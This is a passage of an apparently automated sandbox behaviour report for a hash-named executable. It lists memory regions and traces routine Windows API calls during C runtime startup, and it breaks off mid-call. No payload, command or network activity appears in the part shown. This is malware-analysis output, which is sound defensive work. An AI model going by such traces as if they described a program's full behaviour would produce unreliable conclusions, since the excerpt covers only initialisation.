"pagefile_0x0000000000e90000" filename = "" Region: id = 582 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 583 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 584 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 585 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 586 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 587 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 588 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 589 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 590 start_va = 0xe90000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 591 start_va = 0xe90000 end_va = 0xe90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 592 start_va = 0xea0000 end_va = 0xedffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 593 start_va = 0x3590000 end_va = 0x398ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003590000" filename = "" Region: id = 594 start_va = 0x725b0000 end_va = 0x726fafff monitored = 0 entry_point = 0x72611660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 595 start_va = 0xee0000 end_va = 0xee0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ee0000" filename = "" Region: id = 596 start_va = 0x75860000 end_va = 0x758e3fff monitored = 0 entry_point = 0x75886220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 597 start_va = 0xef0000 end_va = 0xef0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ef0000" filename = "" Region: id = 598 start_va = 0xf00000 end_va = 0xf03fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 599 start_va = 0x1b80000 end_va = 0x1bc4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 600 start_va = 0xf10000 end_va = 0xf13fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 601 start_va = 0x1bd0000 end_va = 0x1c5dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 602 start_va = 0x1c60000 end_va = 0x1c61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c60000" filename = "" Region: id = 603 start_va = 0x3180000 end_va = 0x3180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003180000" filename = "" Region: id = 604 start_va = 0x3990000 end_va = 0x3d8afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003990000" filename = "" Region: id = 605 start_va = 0x3190000 end_va = 0x3193fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 606 start_va = 0x31a0000 end_va = 0x31b2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 607 start_va = 0x31c0000 end_va = 0x31c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000031c0000" filename = "" Region: id = 608 start_va = 0x31d0000 end_va = 0x320ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 609 start_va = 0x3d90000 end_va = 0x418ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d90000" filename = "" Region: id = 610 start_va = 0x4190000 end_va = 0x41cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004190000" filename = "" Region: id = 611 start_va = 0x41d0000 end_va = 0x45cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 612 start_va = 0x45d0000 end_va = 0x460ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045d0000" filename = "" Region: id = 613 start_va = 0x4610000 end_va = 0x4a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004610000" filename = "" Region: id = 614 start_va = 0x70a40000 end_va = 0x70bbdfff monitored = 0 entry_point = 0x70abc630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 615 start_va = 0x72180000 end_va = 0x7244afff monitored = 0 entry_point = 0x723bc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 616 start_va = 0x3190000 end_va = 0x3190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003190000" filename = "" Region: id = 617 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 632 start_va = 0xffb00000 end_va = 0xffea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 634 start_va = 0x6d3b0000 end_va = 0x6d3bbfff monitored = 0 entry_point = 0x6d3b4ad0 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\SysWOW64\\pcacli.dll" (normalized: "c:\\windows\\syswow64\\pcacli.dll") Region: id = 680 start_va = 0xea0000 end_va = 0xedffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 681 start_va = 0x3590000 end_va = 0x398ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003590000" filename = "" Region: id = 682 start_va = 0x3210000 end_va = 0x3213fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 696 start_va = 0xffb00000 end_va = 0xffea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 788 start_va = 0xea0000 end_va = 0xea0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 823 start_va = 0xeb0000 end_va = 0xecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 2198 start_va = 0xa00000 end_va = 0xc11fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 2207 start_va = 0x16c0000 end_va = 0x18cefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 2218 start_va = 0xa00000 end_va = 0xc07fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 2221 start_va = 0x190000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2222 start_va = 0x16c0000 end_va = 0x1abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 2223 start_va = 0x73f00000 end_va = 0x7411bfff monitored = 0 entry_point = 0x740cbc40 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll") Region: id = 2242 start_va = 0x3590000 end_va = 0x379efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003590000" filename = "" Thread: id = 1 os_tid = 0x74c [0116.745] GetStartupInfoW (in: lpStartupInfo=0x7fff00 | out: lpStartupInfo=0x7fff00*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0116.746] GetProcessHeap () returned 0x12c0000 [0117.049] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74650000 [0117.049] GetProcAddress (hModule=0x74650000, lpProcName="FlsAlloc") returned 0x7466a980 [0117.050] GetProcAddress (hModule=0x74650000, lpProcName="FlsFree") returned 0x74674ff0 [0117.050] GetProcAddress (hModule=0x74650000, lpProcName="FlsGetValue") returned 0x74667570 [0117.050] GetProcAddress (hModule=0x74650000, lpProcName="FlsSetValue") returned 0x74669e30 [0117.050] GetProcAddress (hModule=0x74650000, lpProcName="InitializeCriticalSectionEx") returned 0x74676740 [0117.051] GetProcAddress (hModule=0x74650000, lpProcName="CreateEventExW") returned 0x746766a0 [0117.051] GetProcAddress (hModule=0x74650000, lpProcName="CreateSemaphoreExW") returned 0x74676700 [0117.051] GetProcAddress (hModule=0x74650000, lpProcName="SetThreadStackGuarantee") returned 0x7466b040 [0117.051] GetProcAddress (hModule=0x74650000, lpProcName="CreateThreadpoolTimer") returned 0x7466ace0 [0117.051] GetProcAddress (hModule=0x74650000, lpProcName="SetThreadpoolTimer") returned 0x77937dc0 [0117.052] GetProcAddress (hModule=0x74650000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77944010 [0117.052] GetProcAddress (hModule=0x74650000, lpProcName="CloseThreadpoolTimer") returned 0x77942a50 [0117.052] GetProcAddress (hModule=0x74650000, lpProcName="CreateThreadpoolWait") returned 0x7466a7b0 [0117.052] GetProcAddress (hModule=0x74650000, lpProcName="SetThreadpoolWait") returned 0x77942290 [0117.053] GetProcAddress (hModule=0x74650000, lpProcName="CloseThreadpoolWait") returned 0x77942910 [0117.053] GetProcAddress (hModule=0x74650000, lpProcName="FlushProcessWriteBuffers") returned 0x77967a60 [0117.053] GetProcAddress (hModule=0x74650000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7795ac00 [0117.054] GetProcAddress (hModule=0x74650000, lpProcName="GetCurrentProcessorNumber") returned 0x7794a890 [0117.054] GetProcAddress (hModule=0x74650000, lpProcName="GetLogicalProcessorInformation") returned 0x7466ac80 [0117.054] GetProcAddress (hModule=0x74650000, lpProcName="CreateSymbolicLinkW") returned 0x74690830 [0117.054] GetProcAddress (hModule=0x74650000, lpProcName="SetDefaultDllDirectories") returned 0x75fb6270 [0117.055] GetProcAddress (hModule=0x74650000, lpProcName="EnumSystemLocalesEx") returned 0x7466fe80 [0117.055] GetProcAddress (hModule=0x74650000, lpProcName="CompareStringEx") returned 0x7466ff80 [0117.055] GetProcAddress (hModule=0x74650000, lpProcName="GetDateFormatEx") returned 0x74690e00 [0117.056] GetProcAddress (hModule=0x74650000, lpProcName="GetLocaleInfoEx") returned 0x7466a750 [0117.056] GetProcAddress (hModule=0x74650000, lpProcName="GetTimeFormatEx") returned 0x74691240 [0117.056] GetProcAddress (hModule=0x74650000, lpProcName="GetUserDefaultLocaleName") returned 0x7466ad60 [0117.056] GetProcAddress (hModule=0x74650000, lpProcName="IsValidLocaleName") returned 0x74691460 [0117.057] GetProcAddress (hModule=0x74650000, lpProcName="LCMapStringEx") returned 0x74669a10 [0117.057] GetProcAddress (hModule=0x74650000, lpProcName="GetCurrentPackageId") returned 0x75f3ded0 [0117.058] GetProcAddress (hModule=0x74650000, lpProcName="GetTickCount64") returned 0x74663630 [0117.058] GetProcAddress (hModule=0x74650000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0117.059] GetProcAddress (hModule=0x74650000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0117.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x3bc) returned 0x12cc1d0 [0117.061] GetCurrentThreadId () returned 0x74c [0117.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x12c4490 [0117.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x800) returned 0x12d61e0 [0117.062] GetStartupInfoW (in: lpStartupInfo=0x7ffed0 | out: lpStartupInfo=0x7ffed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0117.062] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.062] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0117.062] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.064] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe\" " [0117.064] GetEnvironmentStringsW () returned 0x12d69e8* [0117.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xa1a) returned 0x12d7410 [0117.064] FreeEnvironmentStringsW (penv=0x12d69e8) returned 1 [0117.064] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xfe3ba8, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe")) returned 0x62 [0117.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xce) returned 0x12c9c28 [0117.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x90) returned 0x12c7b08 [0117.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x3e) returned 0x12cb778 [0117.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x5c) returned 0x12ccf60 [0117.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x6e) returned 0x12cb258 [0117.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x78) returned 0x12cf9d8 [0117.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x62) returned 0x12cb578 [0117.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x28) returned 0x12c4250 [0117.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x48) returned 0x12d5c80 [0117.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x1a) returned 0x12ca738 [0117.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x3a) returned 0x12cb610 [0117.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x62) returned 0x12c3b30 [0117.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x2a) returned 0x12ccb60 [0117.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x2e) returned 0x12ccb98 [0117.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x1c) returned 0x12ca760 [0117.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0xd2) returned 0x12cd530 [0117.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x7c) returned 0x12cd3d8 [0117.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x36) returned 0x12d3480 [0117.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x3a) returned 0x12cb6a0 [0117.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x90) returned 0x12caae8 [0117.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x24) returned 0x12c1ba0 [0117.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x30) returned 0x12cc7a8 [0117.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x36) returned 0x12d2f00 [0117.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x48) returned 0x12d5cd0 [0117.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x52) returned 0x12ca2c0 [0117.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x3c) returned 0x12cb7c0 [0117.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0xd6) returned 0x12cd6e8 [0117.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x2e) returned 0x12ccab8 [0117.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x1e) returned 0x12cd460 [0117.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x2c) returned 0x12ccbd0 [0117.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x54) returned 0x12c75f0 [0117.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x52) returned 0x12c7480 [0117.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x24) returned 0x12c3e08 [0117.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x42) returned 0x12d5af0 [0117.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x2c) returned 0x12cc9d8 [0117.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x44) returned 0x12d5eb0 [0117.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x24) returned 0x12c3e38 [0117.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12d7410 | out: hHeap=0x12c0000) returned 1 [0117.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x80) returned 0x12c9a50 [0117.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x8, Size=0x800) returned 0x12d69e8 [0117.078] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0117.078] GetLastError () returned 0x0 [0117.078] SetLastError (dwErrCode=0x0) [0117.078] GetLastError () returned 0x0 [0117.078] SetLastError (dwErrCode=0x0) [0117.078] GetLastError () returned 0x0 [0117.079] SetLastError (dwErrCode=0x0) [0117.079] GetACP () returned 0x4e4 [0117.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x220) returned 0x12ca010 [0117.079] GetLastError () returned 0x0 [0117.079] SetLastError (dwErrCode=0x0) [0117.079] IsValidCodePage (CodePage=0x4e4) returned 1 [0117.079] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x7ffec4 | out: lpCPInfo=0x7ffec4) returned 1 [0117.079] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x7ff98c | out: lpCPInfo=0x7ff98c) returned 1 [0117.079] GetLastError () returned 0x0 [0117.079] SetLastError (dwErrCode=0x0) [0117.079] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x7ffda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.081] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x7ffda0, cbMultiByte=256, lpWideCharStr=0x7ff708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0117.081] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x7ff9a0 | out: lpCharType=0x7ff9a0) returned 1 [0117.081] GetLastError () returned 0x0 [0117.087] SetLastError (dwErrCode=0x0) [0117.087] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x7ffda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.087] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x7ffda0, cbMultiByte=256, lpWideCharStr=0x7ff6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0117.087] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0117.087] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x7ff4c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0117.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x7ffca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" 